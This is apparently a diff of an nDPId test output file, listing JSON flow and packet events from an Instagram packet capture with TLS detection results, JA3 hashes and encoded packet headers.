-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254514,"flow_last_seen":1568796254514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254514,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1568796254514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254514,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDNAbsBxqpOAAAAALAC\/\/8NqAAAAgQFtAEDAwYBAQgKDXB1TAAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2071,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254515,"flow_last_seen":1568796254515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2071,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1568796254515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254515,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDOAbvBtYQbAAAAALAC\/\/9z6gAAAgQFtAEDAwYBAQgKDXB1TAAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2073,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254524,"flow_last_seen":1568796254524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254524,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2073,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1568796254524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254524,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDPAbv9TOkSAAAAALAC\/\/\/TUgAAAgQFtAEDAwYBAQgKDXB1VAAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2074,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1568796254526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254526,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM2mvmccAcaqT6ASbHDxzgAAAgQFeAQCCAoU9Z3GDXB1TAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2075,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1568796254526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254526,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM6bGFkcwbWEHKASbHAfPgAAAgQFeAQCCArYQyzxDXB1TAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2076,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDNAbsBxqpPpr5nHYAQCAyEugAAAQEICg1wdVYU9Z3G"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDOAbvBtYQcmxhZHYAQCAyyKQAAAQEICg1wdVbYQyzx"} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2078,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254514,"flow_last_seen":1568796254528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254528,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2080,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254515,"flow_last_seen":1568796254531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254531,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2082,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1568796254536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254536,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM\/pQUID\/UzpE6ASbHCRrQAAAgQFeAQCCAoUEKcNDXB1VAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1568796254538,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254538,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDPAbv9TOkT6UFCBIAQCAwkmAAAAQEICg1wdV8UEKcN"} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254524,"flow_last_seen":1568796254539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2088,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254514,"flow_last_seen":1568796254539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2092,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254515,"flow_last_seen":1568796254543,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":529,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1568796254543,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2098,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254524,"flow_last_seen":1568796254551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":1154,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796254551,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908576,"flow_last_seen":1436720908733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908577,"flow_last_seen":1436720908737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1436720900687,"flow_last_seen":1436720901200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":46392,"flow_avg_l4_payload_len":799,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796253770,"flow_last_seen":1568796253770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1568796253770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796253770,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDLAbuZigajAAAAALAC\/\/8cPAAAAgQFtAEDAwYBAQgKDXByoQAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1568796253782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796253782,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wMv1rwrBmYoGpKASbHB3qgAAAgQFeAQCCAo6Lg6wDXByoQEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1568796253784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796253784,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDLAbuZigak9a8KwoAQCAwKkgAAAQEICg1wcq86Lg6w"} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796253770,"flow_last_seen":1568796253784,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1568796253784,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":750,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1568796253770,"flow_last_seen":1568796253798,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1610,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1568796253798,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254514,"flow_last_seen":1568796254514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254514,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1568796254514,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254514,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDNAbsBxqpOAAAAALAC\/\/8NqAAAAgQFtAEDAwYBAQgKDXB1TAAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2071,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254515,"flow_last_seen":1568796254515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2071,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1568796254515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254515,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDOAbvBtYQbAAAAALAC\/\/9z6gAAAgQFtAEDAwYBAQgKDXB1TAAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2073,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254524,"flow_last_seen":1568796254524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254524,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2073,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1568796254524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254524,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDPAbv9TOkSAAAAALAC\/\/\/TUgAAAgQFtAEDAwYBAQgKDXB1VAAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2074,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1568796254526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254526,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM2mvmccAcaqT6ASbHDxzgAAAgQFeAQCCAoU9Z3GDXB1TAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2075,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1568796254526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254526,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM6bGFkcwbWEHKASbHAfPgAAAgQFeAQCCArYQyzxDXB1TAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2076,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDNAbsBxqpPpr5nHYAQCAyEugAAAQEICg1wdVYU9Z3G"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDOAbvBtYQcmxhZHYAQCAyyKQAAAQEICg1wdVbYQyzx"} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2078,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254514,"flow_last_seen":1568796254528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254528,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2080,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254515,"flow_last_seen":1568796254531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254531,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 